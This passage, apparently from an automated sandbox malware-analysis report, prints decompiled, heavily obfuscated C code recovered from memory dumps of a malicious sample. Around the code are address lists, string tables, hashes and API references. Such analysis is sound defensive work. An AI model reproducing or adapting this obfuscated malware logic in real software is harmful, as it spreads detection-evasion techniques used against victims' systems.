				_v16 = 0x94d;
				_v16 = _v16 + 0x4187;
				_v16 = _v16 ^ 0x00007836;
				_v48 = 0x21e9;
				_v48 = _v48 ^ 0x3c92a0ae;
				_v48 = _v48 + 0xf596;
				_v48 = _v48 ^ 0x3c9366ad;
				_v52 = 0x4a04;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x56a39f58;
				_v52 = _v52 ^ 0x56bbe121;
				_v80 = 0x166f;
				_v80 = _v80 ^ 0x3bc38db2;
				_v80 = _v80 << 0xd;
				_v80 = _v80 | 0x5d8ccce3;
				_v80 = _v80 ^ 0x7fffd756;
				_v76 = 0xd2e;
				_t214 = 6;
				_v76 = _v76 / _t214;
				_t215 = 0x59;
				_t237 = 0xdd7d922;
				_v76 = _v76 / _t215;
				_v76 = _v76 ^ 0xb1a59fe6;
				_v76 = _v76 ^ 0xb1a5c97b;
				_v40 = 0x2ae1;
				_v40 = _v40 >> 6;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000341b;
				_v64 = 0x37cd;
				_v64 = _v64 + 0xffff3540;
				_v64 = _v64 << 1;
				_v64 = _v64 | 0x66261fef;
				_v64 = _v64 ^ 0xfffeb931;
				_v68 = 0x9ed9;
				_v68 = _v68 + 0xad09;
				_v68 = _v68 ^ 0xfd9e5c2b;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fd99075;
				_v72 = 0x1a2d;
				_v72 = _v72 + 0xc4a4;
				_v72 = _v72 << 6;
				_v72 = _v72 * 0x59;
				_v72 = _v72 ^ 0x135ddffd;
				while(1) {
					L1:
					_t216 = 0x2c1c6573;
					while(_t242 != 0x6072d1c) {
						if(_t242 == _t237) {
							_push(_t216);
							_t199 = E00231132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00232A30);
							_t247 =  &(_t247[9]);
							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
							__eflags = _t199;
							_t216 = 0x2c1c6573;
							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
							L13:
							_t237 = 0xdd7d922;
							continue;
						}
						if(_t242 == 0xe9e2879) {
							_push(_v24);
							_t201 = E00246DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
							_t247 =  &(_t247[5]);
							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
							__eflags = _t201;
							_t202 = 0x303a6ade;
							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
							L12:
							_t216 = 0x2c1c6573;
							goto L13;
						}
						if(_t242 == 0x28cfd81a) {
							return E0023F536(_v64, _v68, _v72, _t241);
						}
						if(_t242 == _t216) {
							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
							_t204 =  *0x24ca24; // 0x0
							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
							 *0x24ca24 = _t241;
							return _t204;
						}
						if(_t242 != 0x2efb68f6) {
							if(_t242 != _t202) {
								L17:
								__eflags = _t242 - 0x35b12720;
								if(__eflags != 0) {
									continue;
								} else {
									return _t202;
								}
								L22:
							} else {
								_t209 = E002376DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
								_t247 =  &(_t247[2]);
								 *((intOrPtr*)(_t241 + 4)) = _t209;
								_t237 = 0xdd7d922;
								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
								goto L1;
							}
						}
						_push(_t216);
						_push(_t216);
						_t224 = 0x38;
						_t208 = E00238736(_t224);
						_t241 = _t208;
						__eflags = _t241;
						if(__eflags != 0) {
							_t242 = 0xe9e2879;
							_t202 = 0x303a6ade;
							goto L12;
						}
						return _t208;
						goto L22;
					}
					E0024422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
					_t242 = 0x28cfd81a;
					_t216 = 0x2c1c6573;
					_t237 = 0xdd7d922;
					goto L17;
				}
			}

0x002426f5
0x002426f8
0x00242700
0x0024270c
0x0024270e
0x00242710
0x00242716
0x0024271e
0x00242720
0x00242728
0x0024272d
0x00242735
0x00242743
0x00242748
0x0024274e
0x00242756
0x00242763
0x00242764
0x00242768
0x00242770
0x00242778
0x00242780
0x00242788
0x0024278d
0x00242795
0x0024279d
0x002427a5
0x002427ad
0x002427b5
0x002427c2
0x002427c6
0x002427ce
0x002427db
0x002427df
0x002427e7
0x002427ef
0x002427f7
0x002427ff
0x00242807
0x0024280f
0x00242817
0x00242824
0x00242828
0x00242830
0x00242838
0x00242846
0x0024284a
0x00242852
0x0024285a
0x00242862
0x0024286a
0x00242872
0x0024287a
0x00242882
0x0024288a
0x00242897
0x0024289b
0x002428a3
0x002428ab
0x002428b3
0x002428bb
0x002428c0
0x002428c8
0x002428d0
0x002428e0
0x002428e5
0x002428ef
0x002428f2
0x002428f7
0x002428fb
0x00242903
0x0024290b
0x00242913
0x00242918
0x0024291d
0x00242925
0x0024292d
0x00242935
0x00242939
0x00242941
0x00242949
0x00242951
0x00242959
0x00242961
0x00242966
0x0024296e
0x00242976
0x0024297e
0x00242988
0x0024298c
0x00242994
0x00242994
0x00242999
0x0024299e
0x002429ac
0x00242a76
0x00242a93
0x00242a98
0x00242a9b
0x00242a9e
0x00242aa5
0x00242aaf
0x00242a3e
0x00242a3e
0x00000000
0x00242a3e
0x002429b8
0x00242a48
0x00242a5a
0x00242a5f
0x00242a62
0x00242a65
0x00242a6c
0x00242a71
0x00242a39
0x00242a39
0x00000000
0x00242a39
0x002429c4
0x00000000
0x00242b0d
0x002429cc
0x00242ae7
0x00242aea
0x00242aef
0x00242af2
0x00000000
0x00242af2
0x002429d8
0x002429dc
0x00242ad9
0x00242ad9
0x00242adf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x002429e2
0x002429f1
0x002429f6
0x002429f9
0x00242a03
0x00242a08
0x00000000
0x00242a08
0x002429dc
0x00242a19
0x00242a1a
0x00242a1d
0x00242a1e
0x00242a23
0x00242a27
0x00242a29
0x00242a2f
0x00242a34
0x00000000
0x00242a34
0x00242b15
0x00000000
0x00242b15
0x00242abf
0x00242ac5
0x00242acf
0x00242ad4
0x00000000
0x00242ad4

Strings

*, xrefs: 0024274E
6x, xrefs: 00242862
XLq, xrefs: 00242700
*, xrefs: 0024290B
}:{, xrefs: 0024284A
!, xrefs: 0024286A
e), xrefs: 00242768
4, xrefs: 00242756
., xrefs: 002428D0

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: .$4$6x$XLq$e)$}:{$!$*$*
API String ID: 0-323616845
Opcode ID: cc624bfb40c0737e49e44d0403b40d13e7c017f7ecb356e751992e642ec36a5f
Instruction ID: 55e8556b02f7723b16d48fc4e41896b89856b96d89fda111c489c37b9627ec01
Opcode Fuzzy Hash: cc624bfb40c0737e49e44d0403b40d13e7c017f7ecb356e751992e642ec36a5f
Instruction Fuzzy Hash: DDA16272918341CFD368CF25C88940BFBE1FB84718F508A1DF5899A260D3B5CA19CF82

Uniqueness

Uniqueness Score: -1.00%

Function 002463C1, Relevance: 11.4, Strings: 9, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E002463C1() {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t166;
				signed int _t167;
				signed int _t168;
				void* _t173;
				void* _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				intOrPtr* _t203;
				signed int _t204;
				signed int* _t205;

				_t205 =  &_v76;
				_v8 = 0x6b5f41;
				_t196 = 0;
				_t173 = 0x1e312b00;
				_v4 = 0;
				_v40 = 0xbf50;
				_v40 = _v40 + 0xffff4d7d;
				_v40 = _v40 ^ 0x1ff0eb0a;
				_v40 = _v40 ^ 0x1ff1e7c7;
				_v68 = 0xcba5;
				_v68 = _v68 + 0xffffed4d;
				_v68 = _v68 >> 9;
				_v68 = _v68 | 0x05a9bf19;
				_v68 = _v68 ^ 0x05a9faf6;
				_v52 = 0xab70;
				_v52 = _v52 + 0xffff3c3f;
				_v52 = _v52 ^ 0x3be47de3;
				_v52 = _v52 ^ 0xc41b8c81;
				_v20 = 0x4c56;
				_t27 =  &_v20; // 0x4c56
				_t197 = 0x53;
				_v20 =  *_t27 / _t197;
				_v20 = _v20 ^ 0x00006ba4;
				_v44 = 0x4e4f;
				_v44 = _v44 + 0xffff1389;
				_v44 = _v44 ^ 0x6e1bb2f9;
				_v44 = _v44 ^ 0x91e4a702;
				_v48 = 0x9b6d;
				_t198 = 0x15;
				_v48 = _v48 / _t198;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x01d9d03e;
				_v16 = 0x7c52;
				_t199 = 0x3a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x0009e5e2;
				_v64 = 0x462a;
				_v64 = _v64 ^ 0x0e1a4a8f;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 ^ 0x000014fb;
				_v72 = 0x5cc4;
				_v72 = _v72 / _t199;
				_v72 = _v72 + 0x2f24;
				_v72 = _v72 + 0xd2bc;
				_v72 = _v72 ^ 0x000179b4;
				_v24 = 0x30ff;
				_t200 = 0x2a;
				_v24 = _v24 / _t200;
				_v24 = _v24 ^ 0x00007cf0;
				_v28 = 0x85cd;
				_v28 = _v28 ^ 0xf8a4d4b8;
				_v28 = _v28 ^ 0xf8a43927;
				_v76 = 0x1878;
				_v76 = _v76 ^ 0x7099aca3;
				_v76 = _v76 ^ 0x4acb853d;
				_v76 = _v76 + 0xffff4ab7;
				_v76 = _v76 ^ 0x3a511503;
				_v32 = 0x1800;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x00002132;
				_v60 = 0xa25b;
				_v60 = _v60 * 0x67;
				_v60 = _v60 + 0x9ac4;
				_v60 = _v60 ^ 0x004180d5;
				_v36 = 0x47a4;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xcd228633;
				_v36 = _v36 ^ 0xcdadbf4b;
				_v12 = 0xe30d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00e3661f;
				_t172 = _v12;
				_t204 = _v12;
				_t201 = _v12;
				_v56 = 0x2740;
				_v56 = _v56 ^ 0x239771de;
				_v56 = _v56 + 0xfffffe7e;
				_v56 = _v56 ^ 0x23985523;
				while(1) {
					L1:
					_t191 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t173 != 0x3fc1d7) {
								if(_t173 == 0x353ab5a) {
									_t202 =  *0x24ca2c; // 0x5d8300
									_t203 = _t202 + 0x230;
									while( *_t203 != _t191) {
										_t203 = _t203 + 2;
									}
									_t201 = _t203 + 2;
									_t173 = 0x6fcf9e2;
									goto L2;
								} else {
									if(_t173 == 0x6adc8a5) {
										_t167 = E0023F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
										_t205 =  &(_t205[5]);
										_t204 = _t167;
										_t166 = 0xd265085;
										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
										_t191 = 0x5c;
										continue;
									} else {
										if(_t173 == 0x6fcf9e2) {
											_t168 = E00232959(_t173, _v68, _v52, _v20, _v56);
											_t172 = _t168;
											_t205 =  &(_t205[4]);
											if(_t168 != 0) {
												_t173 = 0x6adc8a5;
												goto L1;
											}
										} else {
											if(_t173 == _t166) {
												E0024507B(_v72, _v24, _v28, _v76, _t204);
												_t205 =  &(_t205[3]);
												_t196 =  !=  ? 1 : _t196;
												_t173 = 0x17a504e8;
												while(1) {
													L1:
													_t191 = 0x5c;
													goto L2;
												}
											} else {
												if(_t173 == 0x17a504e8) {
													E00235FB2(_v32, _v60, _t204);
													_t173 = 0x3fc1d7;
													while(1) {
														L1:
														_t191 = 0x5c;
														L2:
														goto L3;
													}
												} else {
													if(_t173 != 0x1e312b00) {
														goto L21;
													} else {
														_t173 = 0x353ab5a;
														continue;
													}
												}
											}
										}
									}
								}
								goto L22;
							}
							E00235FB2(_v36, _v12, _t172);
							_t173 = 0x26181ebc;
							_t166 = 0xd265085;
							_t191 = 0x5c;
							L21:
						} while (_t173 != 0x26181ebc);
						L22:
						return _t196;
					}
				}
			}

0x002463c1
0x002463c4
0x002463d2
0x002463d4
0x002463d9
0x002463dd
0x002463e5
0x002463ed
0x002463f5
0x002463fd
0x00246405
0x0024640d
0x00246412
0x0024641a
0x00246422
0x0024642a
0x00246432
0x0024643a
0x00246442
0x0024644a
0x00246450
0x00246455
0x0024645b
0x00246463
0x0024646b
0x00246473
0x0024647b
0x00246483
0x0024648f
0x00246494
0x0024649a
0x0024649f
0x002464a7
0x002464b4
0x002464b7
0x002464bb
0x002464c3
0x002464cb
0x002464d3
0x002464d8
0x002464dd
0x002464e5
0x002464f5
0x002464f9
0x00246501
0x00246509
0x00246511
0x0024651d
0x00246520
0x00246524
0x0024652c
0x00246534
0x0024653c
0x00246544
0x0024654c
0x00246554
0x0024655c
0x00246564
0x0024656c
0x00246574
0x00246578
0x00246580
0x0024658d
0x00246591
0x00246599
0x002465a1
0x002465a9
0x002465ae
0x002465b6
0x002465be
0x002465c6
0x002465cb
0x002465d3
0x002465d7
0x002465db
0x002465df
0x002465e7
0x002465ef
0x002465f7
0x002465ff
0x002465ff
0x00246601
0x00246602
0x00246602
0x00246607
0x00000000
0x00246607
0x00246619
0x002466f6
0x002466fc
0x00246707
0x00246704
0x00246704
0x0024670c
0x0024670f
0x00000000
0x0024661f
0x00246625
0x002466d5
0x002466da
0x002466dd
0x002466e6
0x002466eb
0x002466f0
0x00000000
0x0024662b
0x00246631
0x002466a3
0x002466a8
0x002466aa
0x002466af
0x002466b5
0x00000000
0x002466b5
0x00246633
0x00246635
0x00246679
0x00246680
0x00246686
0x00246689
0x002465ff
0x002465ff
0x00246601
0x00000000
0x00246601
0x00246637
0x0024663d
0x0024665b
0x00246661
0x002465ff
0x002465ff
0x00246601
0x00246602
0x00000000
0x00246602
0x0024663f
0x00246645
0x00000000
0x0024664b
0x0024664b
0x00000000
0x0024664b
0x00246645
0x0024663d
0x00246635
0x00246631
0x00246625
0x00000000
0x00246619
0x00246722
0x0024672a
0x0024672f
0x00246734
0x00246735
0x00246735
0x00246741
0x0024674a
0x0024674a
0x00246602

Strings

ON, xrefs: 00246463
R|, xrefs: 002464A7
$/, xrefs: 002464F9
2!, xrefs: 00246578
A_k, xrefs: 002463C4
*F, xrefs: 002464C3
};, xrefs: 00246432
VLA_k, xrefs: 0024644A
@', xrefs: 002465DF

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/$*F$2!$@'$A_k$ON$R|$VLA_k$};
API String ID: 0-175875280
Opcode ID: 1daf34144ef734eb3a5419613333aadc6e80ac1f714baf8e39de4d9814b9b9a1
Instruction ID: fc1050d7048dcb6a35f56a5970813d965125546f86201c0439d57fc77c32cbe7
Opcode Fuzzy Hash: 1daf34144ef734eb3a5419613333aadc6e80ac1f714baf8e39de4d9814b9b9a1
Instruction Fuzzy Hash: 5D8155711183819FD798CF24C49A81BBBF1FBC5358F504A1DF686466A1C7B9CA58CB83

Uniqueness

Uniqueness Score: -1.00%

Function 00242349, Relevance: 11.4, Strings: 9, Instructions: 190
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00242349(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t153;
				void* _t168;
				signed int _t172;
				char _t177;
				signed int _t178;
				void* _t181;
				char* _t186;
				signed int _t206;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				signed int* _t214;

				_push(_a16);
				_push(0x40);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0023602B(_t153);
				_v20 = 0x10;
				_t214 =  &(( &_v80)[6]);
				_v60 = 0xafa2;
				_v60 = _v60 ^ 0xad7cd4b0;
				_t178 = 0;
				_v60 = _v60 | 0x7a339cd1;
				_t181 = 0x15b39dc0;
				_v60 = _v60 ^ 0xff7ff485;
				_v64 = 0xe220;
				_v64 = _v64 >> 2;
				_v64 = _v64 | 0x618d1066;
				_v64 = _v64 ^ 0x618d4123;
				_v28 = 0xfe94;
				_t206 = 0x17;
				_v28 = _v28 / _t206;
				_v28 = _v28 ^ 0x000043c3;
				_v32 = 0x6fe3;
				_v32 = _v32 >> 1;
				_v32 = _v32 ^ 0x000078b7;
				_v36 = 0x3688;
				_t207 = 0x69;
				_v36 = _v36 * 0x5a;
				_v36 = _v36 ^ 0x00137d17;
				_v24 = 0x8157;
				_v24 = _v24 | 0x6dbfc3a0;
				_v24 = _v24 ^ 0x6dbfb45a;
				_v80 = 0xe945;
				_v80 = _v80 / _t207;
				_v80 = _v80 ^ 0xcc46d226;
				_t208 = 0x62;
				_v80 = _v80 / _t208;
				_v80 = _v80 ^ 0x0215c355;
				_v48 = 0x42ef;
				_v48 = _v48 + 0xffff3840;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0xfff789fd;
				_v72 = 0xbf2b;
				_v72 = _v72 | 0xc326a1c7;
				_t209 = 0x4b;
				_v72 = _v72 / _t209;
				_v72 = _v72 | 0xd12f9700;
				_v72 = _v72 ^ 0xd3bfbe8a;
				_v52 = 0xfa61;
				_v52 = _v52 << 3;
				_v52 = _v52 + 0x5488;
				_v52 = _v52 ^ 0x00084626;
				_v56 = 0xb5dc;
				_v56 = _v56 | 0x6ca6e5ac;
				_v56 = _v56 * 0x5e;
				_v56 = _v56 ^ 0xe54e28a7;
				_v76 = 0xbf9d;
				_v76 = _v76 + 0xdb7b;
				_v76 = _v76 + 0xffff5618;
				_v76 = _v76 | 0xc179f847;
				_v76 = _v76 ^ 0xc1798349;
				_v40 = 0xd8e6;
				_v40 = _v40 + 0x2ceb;
				_v40 = _v40 + 0x406a;
				_v40 = _v40 ^ 0x0001168e;
				_v68 = 0x1b9c;
				_t210 = 0x7a;
				_v68 = _v68 * 0x38;
				_v68 = _v68 + 0xa456;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x00002836;
				_v44 = 0x7a08;
				_v44 = _v44 << 0xd;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00205e6a;
				while(_t181 != 0x12ef740) {
					if(_t181 == 0x13e246ff) {
						__eflags = _v16;
						_t186 =  &_v16;
						while(__eflags != 0) {
							_t177 =  *_t186;
							__eflags = _t177 - 0x30;
							if(_t177 < 0x30) {
								L11:
								__eflags = _t177 - 0x61;
								if(_t177 < 0x61) {
									L13:
									__eflags = _t177 - 0x41;
									if(_t177 < 0x41) {
										L15:
										 *_t186 = 0x58;
									} else {
										__eflags = _t177 - 0x5a;
										if(_t177 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t177 - 0x7a;
									if(_t177 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t177 - 0x39;
								if(_t177 > 0x39) {
									goto L11;
								}
							}
							_t186 = _t186 + 1;
							__eflags =  *_t186;
						}
						_t181 = 0x12ef740;
						continue;
					} else {
						if(_t181 == 0x15b39dc0) {
							_t181 = 0x3a71512f;
							continue;
						} else {
							if(_t181 != 0x3a71512f) {
								L19:
								__eflags = _t181 - 0x2b24b5a2;
								if(__eflags != 0) {
									continue;
								}
							} else {
								if(E0023602C(_v60,  &_v16,  &_v20, _v64) != 0) {
									_t181 = 0x13e246ff;
									continue;
								}
							}
						}
					}
					return _t178;
				}
				_push(0x24c030);
				_push(_v36);
				_t168 = E0024878F(_v28, _v32, __eflags);
				E002431E2(__eflags);
				_t143 =  &_v56; // 0x205e6a
				_t172 = E00246A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
				__eflags = _t172;
				_t152 = _t172 > 0;
				__eflags = _t152;
				_t178 = 0 | _t152;
				E00242025(_v40, _t168, _v68, _v44);
				_t214 =  &(_t214[0xc]);
				_t181 = 0x2b24b5a2;
				goto L19;
			}

0x00242350
0x00242354
0x00242356
0x0024235a
0x0024235e
0x0024235f
0x00242360
0x00242365
0x0024236d
0x00242370
0x0024237a
0x00242382
0x00242384
0x0024238c
0x00242391
0x00242399
0x002423a1
0x002423a6
0x002423ae
0x002423b6
0x002423c4
0x002423c9
0x002423cf
0x002423d7
0x002423df
0x002423e3
0x002423eb
0x002423f8
0x002423fb
0x002423ff
0x00242407
0x0024240f
0x00242417
0x0024241f
0x0024242f
0x00242433
0x0024243f
0x00242444
0x0024244a
0x00242452
0x0024245a
0x00242462
0x00242467
0x0024246f
0x00242477
0x00242483
0x00242486
0x0024248a
0x00242492
0x0024249a
0x002424a2
0x002424a7
0x002424af
0x002424b7
0x002424bf
0x002424cc
0x002424d0
0x002424d8
0x002424e0
0x002424e8
0x002424f2
0x002424ff
0x0024250c
0x00242514
0x0024251c
0x00242524
0x0024252c
0x0024253b
0x0024253c
0x00242540
0x00242548
0x0024254d
0x00242555
0x0024255d
0x00242568
0x0024256c
0x00242574
0x0024257a
0x002425bb
0x002425c0
0x002425c4
0x002425c6
0x002425c8
0x002425ca
0x002425d0
0x002425d0
0x002425d2
0x002425d8
0x002425d8
0x002425da
0x002425e0
0x002425e0
0x002425dc
0x002425dc
0x002425de
0x00000000
0x00000000
0x002425de
0x002425d4
0x002425d4
0x002425d6
0x00000000
0x00000000
0x002425d6
0x002425cc
0x002425cc
0x002425ce
0x00000000
0x00000000
0x002425ce
0x002425e3
0x002425e4
0x002425e4
0x002425e9
0x00000000
0x0024257c
0x00242582
0x002425b4
0x00000000
0x00242584
0x0024258a
0x0024265e
0x0024265e
0x00242664
0x00000000
0x00000000
0x00242590
0x002425aa
0x002425b0
0x00000000
0x002425b0
0x002425aa
0x0024258a
0x00242582
0x00242673
0x00242673
0x002425ed
0x002425f2
0x002425fe
0x0024260d
0x0024261a
0x00242637
0x0024264c
0x0024264e
0x0024264e
0x0024264e
0x00242651
0x00242656
0x00242659
0x00000000

Strings

, xrefs: 00242399
/Qq:, xrefs: 00242584
6(, xrefs: 0024254D
j@, xrefs: 0024251C
o, xrefs: 002423D7
j^ , xrefs: 0024261A
j^ , xrefs: 00242562
/Qq:, xrefs: 002425B4
E, xrefs: 0024241F

Memory Dump Source

Source File: 00000007.00000002.2111086691.0000000000231000.00000020.00000001.sdmp, Offset: 00230000, based on PE: true

Associated: 00000007.00000002.2111061429.0000000000230000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2111135016.000000000024C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
API String ID: 0-892457230
Opcode ID: 3c2d2a3d4f6714c1689d69c28e5d17223dbcc16a4b78aa89dc05da0b72ccb0c0
Instruction ID: 1c4b9c5b944197ee619386107a8f09b40357ee13263e6e0408a587dbab6d3ad1
Opcode Fuzzy Hash: 3c2d2a3d4f6714c1689d69c28e5d17223dbcc16a4b78aa89dc05da0b72ccb0c0
Instruction Fuzzy Hash: 83818571519341DFD768CF26C98A51BBBE1BBC1B18F80490DF1859A2A0D7B5CA1ACF43

Uniqueness

Uniqueness Score: -1.00%

Function 10002D70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108commemoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
PropVariantClear.OLE32(?), ref: 10002E75
SysFreeString.OLEAUT32(00000000), ref: 10002E7E
SysFreeString.OLEAUT32(00000000), ref: 10002E97

Strings

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77

Memory Dump Source

Source File: 00000007.00000002.2115780820.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2115770180.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115805909.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2115830382.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2115840908.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$AllocClearCreateInstancePropVariant
String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
API String ID: 2501108336-1018649646
Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00249B45, Relevance: 10.3, Strings: 8, Instructions: 294
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00249B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t241;
				intOrPtr _t259;
				void* _t260;
				intOrPtr _t268;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr* _t281;
				signed int _t283;
				void* _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int* _t322;
				signed int* _t325;
				void* _t327;

				_t281 = _a8;
				_push(_t281);
				_push(_a4);
				_t316 = __ecx;
				_push(__edx);
				_push(__ecx);
				E0023602B(_t241);
				_v76 = 0xd801;
				_t325 =  &(( &_v116)[4]);
				_v76 = _v76 >> 6;
				_t315 = 0;
				_t283 = 0xafaf7d2;
				_t317 = 6;
				_v76 = _v76 * 0x2a;
				_v76 = _v76 ^ 0x0000b202;
				_v80 = 0xa1a8;
				_v80 = _v80 | 0xe917477a;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0xa45f8c0e;
				_v84 = 0x144b;
				_v84 = _v84 + 0xffffbc75;
				_v84 = _v84 * 0x6d;
				_v84 = _v84 ^ 0xffeb93ca;
				_v52 = 0x2e4b;
				_v52 = _v52 | 0x557249c0;
				_v52 = _v52 ^ 0x346b51fe;
				_v52 = _v52 ^ 0x611902e1;
				_v56 = 0xfad0;
				_v56 = _v56 + 0xffff1342;
				_v56 = _v56 ^ 0x8fd20197;
				_v56 = _v56 ^ 0x8fd21d65;
				_v96 = 0x8e39;
				_v96 = _v96 + 0xd833;
				_v96 = _v96 + 0xffffc0bd;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x000036ba;
				_v12 = 0xb209;
				_v12 = _v12 ^ 0xf6f529e5;
				_v12 = _v12 ^ 0xf6f5ec43;
				_v64 = 0xc247;
				_v64 = _v64 + 0xffff53d4;
				_v64 = _v64 << 9;
				_v64 = _v64 ^ 0x002c2f20;
				_v100 = 0x41c0;
				_v100 = _v100 | 0x528356d8;
				_v100 = _v100 ^ 0x6d95e5a5;
				_v100 = _v100 >> 1;
				_v100 = _v100 ^ 0x1f8b2fe0;
				_v16 = 0x904b;
				_v16 = _v16 + 0x3d62;
				_v16 = _v16 ^ 0x0000a85c;
				_v68 = 0xf7e0;
				_v68 = _v68 | 0xcc3d0ce1;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01982b66;
				_v72 = 0x69a0;
				_v72 = _v72 / _t317;
				_v72 = _v72 ^ 0xd5ac5c66;
				_v72 = _v72 ^ 0xd5ac219b;
				_v20 = 0x9739;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x000260e8;
				_v24 = 0xc564;
				_t318 = 0x2c;
				_v24 = _v24 / _t318;
				_v24 = _v24 ^ 0x00005d30;
				_v88 = 0xe78a;
				_v88 = _v88 >> 1;
				_v88 = _v88 << 4;
				_v88 = _v88 ^ 0x00070feb;
				_v28 = 0x7421;
				_v28 = _v28 + 0xffff545c;
				_v28 = _v28 ^ 0xfffff127;
				_v32 = 0x3ef3;
				_t319 = 0x23;
